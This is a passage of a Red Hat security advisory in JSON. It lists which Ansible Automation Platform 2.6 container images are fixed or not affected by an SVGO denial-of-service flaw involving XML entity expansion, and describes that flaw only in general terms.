"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2445132"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in SVGO, an SVG (Scalable Vector Graphics) Optimizer. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by submitting a specially crafted XML file. The application\u0027s failure to properly guard against XML entity expansion or recursion can lead to the Node.js process consuming excessive memory and crashing.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "svgo: SVGO: Denial of Service via XML entity expansion",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
